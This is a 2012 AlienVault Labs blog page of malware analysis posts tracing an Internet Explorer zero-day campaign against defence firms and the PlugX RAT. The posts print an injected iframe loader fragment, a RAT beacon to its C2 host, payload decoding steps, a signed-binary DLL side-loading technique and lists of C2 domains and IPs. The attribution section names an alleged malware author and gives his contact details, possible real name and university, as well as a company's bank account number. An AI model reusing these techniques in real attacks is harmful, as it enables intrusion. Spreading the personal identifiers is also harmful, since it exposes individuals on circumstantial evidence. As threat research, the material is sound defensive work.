AlienVault R&D Labs Portal. Get the latest news from our research.
Header

New versions of the IExplorer ZeroDay emerge targeting Defence and Industrial companies

September 19th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | Malware | Snort - (Comments Off)

As we related in our previous blog post the latest Internet Explorer ZeroDay is being used to target specific sectors including the Defence and Industrial ones.

Following our investigations on the servers found serving the Internet Explorer Zeroday and using OSINT, we were able to use the WHOIS mail address and the ip addresses used by the attackers to find fake domains registered by them that contain specific names of companies related with:

- US Aircraft and weapons delivery systems company

- US Defence decoy countermeasures company

- US Aerospace and defence technology company

- US Supplier for repairs of tactical fighters

- Laboratory for energetic systems and materials

- UK Defence contractor

We also found a fake domain of a company that builds turbines and power sources used in several applications including utilities and power plants.

We were able to check that the official website of the company has been compromised as well and it is serving the Internet Explorer ZeroDay to the visitors. They’ve included an iframe to the exploit in the entry page:

 

 

The version of the exploit found seems to be based on the code that we found in the previous servers and also uses the Grumgog.swf Flash file to aid on the exploitation.

Apart from that, it seems the exploit code has evolved and they are now able to infect not only Windows XP but also Windows 7 32 bits running Java6. This is based on the Dodge.html file we found within the exploit code:

 

 

 

 

 

 

 

 

 

 

 

The flash file is also encrypted with DoSWF as the previous versions and licensed to bnetbgm@163.com.fr. Once the vulnerability is triggered, the malicious code downloads the payload from /_include/site.exe.

The payload is obfuscated with the same XOR 70 scheme and once again it contains a version of the PlugX RAT that we found in previous attacks.

The PlugX RAT connect to a C&C server on oXXX.blogdns.com that resolvs to 142.4.46.214. I recommend you to search your logs for connections to that ip address since it will be a symptom of a compromised system.

In the other hand, these Emerging Threats Snort rules will help you catching exploit attempts and related activity:

2015704 – ET CURRENT_EVENTS DoSWF Flash Encryption Banner
2015711 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day
2015712 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day

Happy hunting!

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , ,

The connection between the Plugx Chinese gang and the latest Internet Explorer Zeroday

September 18th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits - (Comments Off)

Some hours ago my friend PhysicalDrive0 pointed me to a new version of Moh2010.swf that was found in the wild as part of some content exploiting the last Internet Explorer Zeroday.

The exploit code was being served on www.nod32XX.com hosted on:

 

 

 

 

 

 

 

 

 

 

The exploit scheme is the same one, the original vector is hosted under /Exploit.html. It setups the img content and load the Moh2010.swf  file:

 

 

 

 

 

 

 

 

 
 

- The file Moh2010.swf is a bit different than the previous one. It is also encrypted using DoSWF but the encrypted content is different:

 

 

 

 

 

 

 

 

We can also check that DoSWF is licensed to bnetbgm@163.com.fr:

 

 

 
 

Once the SWF file is executed it loads a new iframe:

evalRdocument.body.innerHTML=”x<iframe src=Eternalian.html width=10 height=1></iframe>”

This file is very similar to the Protect.html one that we described in our report yesterday.

 

 

 
 

 

 

It triggers the actual vulnerability. The swf file has sprayed the heap and the shellcode is in charge of downloading, decrypting and executing the payload.

The HTTP headers on the server indicates that the files have been created four days ago meaning that the Zeroday vulnerability wasn’t mainstream yet:

last-modified: Fri, 14 Sep 2012 05:29:51 GMT

Last-Modified: Fri, 14 Sep 2012 05:30:07 GMT

Due to the encryption of the SWF file using DoSWF the easiest way to obtain the original file is attaching to Internet Explorer and dumping the decrypted SWF file:

 

 

 

 

 

 

 

 

 
 

 

On the decrypted SWF file we found a Bytearray:

 

 

 

 

 

 

 

 

 

 
 

If we apply a base64 decode and then we apply a XOR E2 operation we obtain the URL of the malicious payload:

www.nod32XX.com/test.exe (md5: fef2d60ec7ec015f1e119dc469b14f59)

As we can see the content is obfuscated somehow. If we apply a XOR 70 operation on the bytes which value differs from 00 or 70 we obtain the original payload md5: 00fdb6ad7345c0912ea9d2fa4c49950e.

The malicious payload contains several resources that are decompressed (Winrar) during execution:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\RarSFX0\Nv.exe MD5: 09B8B54F78A10C435CD319070AA13C28
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\RarSFX0\Nv.mp3 MD5: B29265A6932E1FC4DEE6FA6908413A50
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\RarSFX0\NvSmartMax.dll MD5: 0B21678ED8E2B117344CFCEBA8F097DD

The file NvSmartMax.dll is familiar, isn’t it?. We described this technique some days ago. The file Nv.exe algo known as NvSmart.exe is a benign file signed by Nvidia and used widely by Nvidia in several applications.

 

 

 

 

 

 
 

 

Once Nv.exe is executed it loads NvSmartMax.dll that has been modified to execute the binary content present on  Nv.mp3.

 

 

 

 

 

 

 

 

Due to the fact that Nv.exe is digitally signed with a valid certificate it can bypass some of the Operating System restrictions and this technique is used to execute the malicious payload every time the system is booted.

Surprise!. The actual payload present on Nv.mp3 is a version of the PlugX RAT that we uncovered a few days ago. Do you remember WHG, the guy behind it?.

We can find the same debug path that we found in our previous blog post:

d:\work\plug4.0(nvsmart)(sxl)\shellcode\shellcode\XSetting.h

d:\work\plug4.0(nvsmart)(sxl)\shellcode\shellcode\XPlug.h

The RAT connect to the C&C server on exchange.likescandy.com currently pointing to 108.171.193.92:

 

 

 

 
 

 

The RAT uses the well know Update Protocol, example:

POST /update?id=000f6b50 HTTP/1.1
Accept: */*
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705)
Host: exchange.likescandy.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Summary

We know that the group actively using the PlugX malware also called Flowershow had access to the Internet Explorer ZeroDay days before it was uncovered. Due tot he similarities of the new discovered exploit code and the one discovered some days ago it is very likely that the same group is behind both instances.

They are using the PlugX RAT as well as the NvSmart technique found in previous targeted attacks in the past. In our previous post we were able to identify the author of this RAT and due to the similarities of the attacks it is very likely that the guy is involved somehow in this code.

We’ve identify several ip addresses and domains that are currently used by this gang including:

aol.selfip.com 180.210.204.180
inmailbase.selfip.com 180.210.204.180
exchange.from-sc.com 180.210.204.180
exchange.likescandy.com 180.210.204.180
exchange.is-a-landscaper.com 180.210.204.180
leanov.gicp.net 180.210.204.180
netbastthebash.dnsalias.net 180.210.204.180
wwwh4ck.3322.org 180.210.204.180
gary-freudenberger.homeftp.org 180.210.204.180

aol.selfip.com 142.4.46.203
ns18.doomdns.com 142.4.46.203
exchange.from-sc.com 142.4.46.203
exchange.likescandy.com 142.4.46.203
exchange.is-a-landscaper.com 142.4.46.203

I recommend you to check your logs for connections to those IPs/Domains to identify if your systems are targeted by them.

More information regarding WHG

After some research on Whg we were able to get some new information about him:

- Whg went to Xihua (Sichuan province) University as revealed by other mail adress (whg0001@263.com“) and a personal web account on the university server http://pweb.scit.edu.cn/~whg. You can find  references on Baidu/others where he talks about the university as well as source code written when he was a student.

http://en.wikipedia.org/wiki/Network_Crack_Program_Hacker_(NCPH)_Group

“The Network Crack Program Hacker (NCPH) group is a Chinese hacker group based out of Zigong in Sichuan Province”
“Wicked Rose credits the Chinese hacker WHG, also known as “fig” as one of the developers of the GinWui rootkit. WHG is an expert in malicious code”
“Security researchers discovered the rootkit on 18 May 2006 attackers utilized it in attacks on the US and Japan. Attackers introduced it to the US in an attack against a Department of Defense entity. They used two different versions of the rootkit in attacks during May and June 2006.”
“After winning the military network attack/defense competition, the group obtained a sponsor who paid them 2000 RMB per month. IDefense believes their sponsor is likely the People’s Liberation Army (PLA) but has no definitive evidence to support this claim.”
“Tan Dailin was a graduate student at Sichuan University when he was noticed (for attacking a Japanese site) by the People’s Liberation Army (PLA) in the summer of 2005. He was invited to participate in a PLA-sponsored hacking contest and won. He subsequently participated in a one-month, 16-hour-per-day training program where he and the other students simulated various cyber invasion methods, built dozens of hacking exploits, and developed various hacking tactics and strategies. He was chosen for the Sichuan regional team to compete against teams from Yunnan, Guizhou, Tibet, and Chongqing Military Districts. His team again ranked number one and he won a cash prize of 20,000 RMB.

Then, under the pseudonym Wicked Rose, he formed the Network Crack Program Hacker (NCPH) Groupand recruited other talented hackers from his school. He found a funding source (an unknown benefactor) and started attacking US sites. After an initial round of successful attacks, his funding was tripled. All through 2006, NCPH built sophisticated rootkits and launched a barrage of attacks against multiple US government agencies. By the end of July, 2006, NCPH had created some 35 different attack variants for one MS Office vulnerability. During the testing phase, NCPH used Word document vulnerabilities. They switched to Excel and later to PowerPoint vulnerabilities. The result of all of this activity is that the NCPH group siphoned thousands, if not millions, of unclassified US government documents back to China.”

http://fserror.com/pdf/WickedRose_andNCPH.doc

WHG is not a core member of NCPH but a close affiliate of Wicked Rose.  WHG appears to be central to development of the NCPH rootkit, aka GinWui.  WHG is credited by Wicked Rose as one of the authors of this malicious code.  WHG is an experienced malicious code author with the following contact information:

  • E-mail address: whg@163.com
  • QQ Number: 312016
  • Website: http://cnasm.com
  • Real Name: May be “Zhao Jibing”,赵纪斌.
  • Location: Believed to be employed in the Sichuan province of China.

Warlock: Master of the Arcane game

 After reviewing the files used to exploit the Internet Explorer vulnerability we’ve identified that those guys are fans of a game called “Warlock: Master of the Arcane”. The are using several variables inside the code that refers to Warlock’s Great Mages names. Some examples are:

King Lich V inside the decrypted SWF file

<body onload=’Elpiritster();’onselect=’TestArray()’> on the Eternalian.html file.

I hope you enjoyed this blog post!

 
Update:

During the last few hours we found two more sites that were serving the Zeroday exploit in the past.

The first file we found was a version of Protect.html that was being served in the webpage of one of the main Defense News Portal in India. It contains code to trigger the Internet Explorer vulnerability and it was being served four days ago. We couldn’t retrieve the actual payload and it seems the malicious content is not there anymore.

The second server that was serving the exploit seems to be a fake domain of the 2nd International LED professional Symposium +Expo and it was taken down a few hours ago:

led-professional-symposium.org

Created On:06-Jul-2012 07:04:31 UTC
Last Updated On:18-Sep-2012 17:08:27 UTC
Expiration Date:06-Jul-2013 07:04:31 UTC
Sponsoring Registrar:GoDaddy.com, LLC (R91-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Registrant ID:CR118174435
Registrant Name:Gexin sun
Registrant Street1:Yaroslaviv Val Street, Kyiv, 01034,
Registrant City:Kiev
Registrant State/Province:Kiev
Registrant Postal Code:03022
Registrant Country:UA
Registrant Phone:+380.952756104
Registrant Email:kathycat88@gmail.com

The first vector was hosted under led.html:

 
 

 
 
 

 

The code is very similar to the previous ones. Notice that the name of the swf used is different Grumgog.swf. Also notice that Grumgog is also a term used in the “Warlock: Master of the Arcane game”

The flash file is also encrypted with DoSWF using the license key issued to “bnetbgm@163.com.fr” as in the previous version.

Once decrypted we identified that an iframe is loaded (Dodge.html). We couldn’t retrieve the original content.

Once the vulnerability is triggered, the malicious payload is downloaded from update.exe (the file was removed at the time of the analysis).

It seems the guys behind this 0day were targeting specific industries. We’ve seen that they compromised a news site related to the defense industry and they created a fake domain related to LED technologies that can be used to perform spearphishing campaigns to those industries.

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , ,

Tracking down the author of the PlugX RAT

September 13th, 2012 | Posted by jaime.blasco in APT | Attacks | News - (Comments Off)

Some days ago, TrendMicro published some information about a new version of a RAT called PlugX. From the last few months we have been tracking a group using the PlugX RAT that has been attacking different targets especially in Japan, Taiwan, Korea and against Tibetan organizations and individuals.

In this post we will focus on the intelligence we have extracted from the payloads of the attacks and how we used this information to track the author of the RAT that is very likely to be involved in the attacks as well.

During the past few months we have seen some spearphishing campaigns against Tibetan targets using mainly Microsoft Office Exploits (CVE-2012-0158). Those documents used a very tricky technique; the payload dropped was a benign Nvidia executable (NvSmart.exe), a DLL (NvSmartMax.dll) and a binary file (boot.ldr) This technique was explained by Symantec as well.

NvSmart.exe

https://www.virustotal.com/file/523d28df917f9d265cd2c0d38df26277bc56a535145100ed82e6f5fdeaae7256/analysis/

 

As we can see the binary file is signed by Nvidia since it is a benign file used on some Nvidia applications. Once NvSmart.exe is executed, it loads NvSmartMax.dll. The attackers drop a modified version of NvSmartMax.dll which executes the binary content present on boot.ldr that contains the actual malicious code.

Since NvSmart.exe is configured to run when the computer starts and it contains a valid digital signature, it will bypass some of the OS restrictions and the malicious code will be executed when the system boots.

Once the payload is executed, a decoy file is shown to the user as in most of the attacks we have seen in the past few years.

Here is an example of some of the decoy content used by the attackers:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

It happens that in most of the boot.ldr files we have found the RAT called PlugX.

At the beginning of our investigations some months ago, we found out that in some of the PlugX binaries we were able to extract some debug paths like:

Hash: c1c80e237f6fbc2c61b82c3325dd836f3849ca036a28007617e4e27ba2f16c4b

Debug Path: d:\work\plug4.0(nvsmart)(sxl)\shellcode\shellcode\XPlug.h

Compilation date: 6/17/2012 16:44:58

 

Hash: 1a091c2ddf77c37db3274f649c53acfd2a0f14780479344d808d089faa809a_HHDL’s Birthday Celebration.doc

Debug Path: d:\work\Plug3.0(Gf)UDP\Shell6\Release\Shell6.pdb

Compilation date: 6/17/2012 16:44:58

 

Hash: 42813b3a43611efebf56239a1200f8fc96cd9f3bac35694b842d9e8b02a

Debug Path: d:\work\plug4.0(nvsmart)\shellcode\shellcode\XPlug.h

Compilation date: 5/26/2012 7:16:08

 

Hash: 28762c22b2736ac9728feff579c3256bd5d18bdfbf11b8c00c68d6bd905af5b8

Debug Path: d:\work\plug3.1(icesword)\shellcode\shellcode\XPlug.h

Compilation date: 6/14/2012 6:06:00
It seems that there are several versions of the RAT and if you take a look at the binaries you will realize that there are some changes and new capabilities in each version.

We searched through our collection to see if we could find other XPlug samples apart from the ones dropped by the malicious documents we had. We found some other samples:

Hash: 3b01677582e7a56942a91da9728c6251- financial_report.exe

Debug Path: C:\Users\whg\Desktop\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 6/17/2012 16:44:58

 

Hash: 60ee900d919da8306b7b6dbe7e62fee49f00ccf141b2e396f5a66be51a00e34f

Debug Path: C:\Documents and Settings\whg\\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 2012-03-12 07:04:12

 

Hash: c00cd2dcddbb24383a3639ed56e68a24dc4561b1248efa4d53aa2b68220b4b2a

Debug Path: C:\Users\whg\Desktop\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 3/12/2012 14:23:58

As we can see the debug paths found on those files are a bit more interesting since the path contains a username “whg”. We have two different paths, “C:\Documents and Settings\whg\” and  “C:\Users\whg\” so it is likely that in the first case the author is using a Windows XP system and in the second one he is using a Vista/7 system.

With this information, we began to search binary files that contain similar debug paths. Our search found an application called SockMon that leads us to http://www.cnasm.com/view.asp?classid=49&newsid=320 and http://www.cnasm.com/view.asp?classid=49&newsid=315.

The debug paths that we found in files that belong to a different SockMon version are the following ones:

C:\Users\whg\Desktop\SockMon2011\SockMon\UnitCache.pas

c:\Documents and Settings\whg\SockMon2010\RunProtect\Release\RunProtect.pdb

c:\Documents and Settings\whg\\SockMon2010\SmComm\Release\SmComm.pdb

We also found another library called vtcp (http://www.cnasm.com/vtcpsdk/) that contains the following debug path:

C:\Users\whg\Desktop\vtcp11.0lib\vtcpT0\UnitMain.pas

Does this all look familiar to you?. It seems that the user “whg” has compiled these components and he is also running a couple of machines with different paths that correspond to the ones we found on the XPlug RAT.

If we take a look at cnasm.com we can find the following contact information:

email: whg0001 at 163.com

QQ: 312016

So the mail address also coincide with the username we found in the debug path of the RAT samples.

Let’s see what we find about whg0001 at 163.com. The mail address was used as the administrative contact of the domain chinansl.com back in 2000:

Domain Name      : chinansl.com

PunnyCode        : chinansl.com

Creation Date    : 2000-08-08 00:00:00

Updated Date     : 2012-02-29 11:26:22

Expiration Date  : 2013-08-08 00:00:00

 

Registrant:

Organization   : chinansl technology co.,itd

Name           : lishiyun

Address        : Room E8BC , XiangFu Garden , 3rd Southern portion of 2nd ringroad , Chengdu , Si

City           : chengdushi

Province/State : sichuansheng

Country        : china

Postal Code    : 610041

 

Administrative Contact:

Name           :

Organization   : chinansl technology co.,itd

Address        :

City           : chengdushi

Province/State : sichuansheng

Country        : china

Postal Code    : 610041

Phone Number   :

Fax            : 086-028-85459578

Email          : whg0001@163.com

In this link you can find more information about the company, overview:

Company Name: CHINANSL TECHNOLOGY CO.,LTD.

Address: Chengdu National Information Security Production Industrialization Base , 2nd Floor ,No.8 Chuangye   Road

Telephone: 02866853362

Custom Code: 5101730218773

Company Code: 730

Account-opening Bank: Xisanqi Sub-branch, Beijing Branch, Bank of China

Account Name: Beijing Lingtong Economic Consulting Co., Ltd

Account Number: 813715881608091001

 

 
 

 
 

 
 
 
 

From the information we collected it seems to be a Chinese company related to the security industry. Of course!

We also found a software component called “Parent Carefree Filter”

https://www.virustotal.com/file/3babb326615b899e976a1a9dc51ec04118701a5de702494f1d363194060c5db7/analysis/

publisher…………….: CHINANSL

product………………: Parent Carefree Filter

internal name…………: FamHook

file version………….: 3, 0, 0, 1

original name…………: FamHook.dll

copyright…………….: CHINANSL

description…………..: Parent Carefree Filter

And of course we found similar debug paths on the file:

c:\Documents and Settings\whg\Pnw(all)\Pc()\FamHook\Release\FamHook.pdb

You can find some advisories that Chinansl published back to 2000:

CHINANSL Security Advisory(CSA-200110)

Tomcat 4.0-b2 for winnt/2000 show “.jsp” source Vulnerability

CHINANSL Security Advisory(CSA-200011)

PHP AND APACHE Vulnerability

CHINANSL Security Advisory(CSA-200012)

Ultraseek Server 3.0 Vulnerability

CHINANSL Security Advisory(CSA200013)

IBM WCS local user exceed his authority to access another file

CHINANSL Security Advisory(CSA-200105)

Tomcat 3.0 for win2000 Directory traversal Vulnerability

CHINANSL Security Advisory(CSA-200106)

JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 Directory traversal Vulnerability

CHINANSL Security Advisory(CSA-200108)

Tomcat 3.2.1 for win2000 Directory traversal

CHINANSL Security Advisory(CSA-200107)

IBM WCS 4.0.1 + Application Server 3.0.2 for Solaris 2.7 show “.jsp” source Vulnerability.

CHINANSL Security Advisory(CSA-200109)

Tomcat 4.0-b1 for winnt/2000 show “.jsp” source Vulnerability.

 

About whg0001 we can find several references on the Internet about him.

https://www.xfocus.net/bbs/index.php?act=ST&f=1&t=54500

http://bbs.krshadow.com/thread-58032-1-1.html

They describe him as “Virus expert. Proficient in assembly.”.

And finally here is the CSDN profile where you can find a photo of him:

 

 

 

 

 

 

 

 

At this point you must be thinking we cannot accuse whg of being related to the XPlug RAT and the targeted campaigns just for a couple of debug paths inside the binary, can we?

Ok, here is the final touch. After searching for more versions of the PlugX RAT we found these two samples:

2ba7f1cc1f46a17ccfbef6b327d8c4e47f9d56922debcad27e5db569f4cf818d

51e50d810172591ee04e12cfce0792f3154356588eacadc01288e3a4fda915fb

They contains this debug path:

i:\work\plug2.0()\shellcode\shellcode\XPlug.h

and the following URL:

http://tieba.baidu.com/f?kz=866965377

that seems to be used as a test or to check connectivity (more info in future posts).

Surprisingly when you open the URL you can see the following:

 

 

 

 

 

 

 

is this guy familiar to you?

With the information we have, we can say that this guy is behind the active development of the PlugX RAT. We can also say he has probably some inside of the operations since this path

“d:\work\plug4.0(nvsmart)\shellcode\shellcode\XPlug.h” tells us that he knew the RAT was going to be weaponized through the Nvsmart technique to be used in the spearphishing campaigns.

According to the information on this research  a previous version of this malware also called Thoper/Tvt/Sogu was used to compromise SK Communications in South Korea back in 2011.

 

 

 

 

 

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , , ,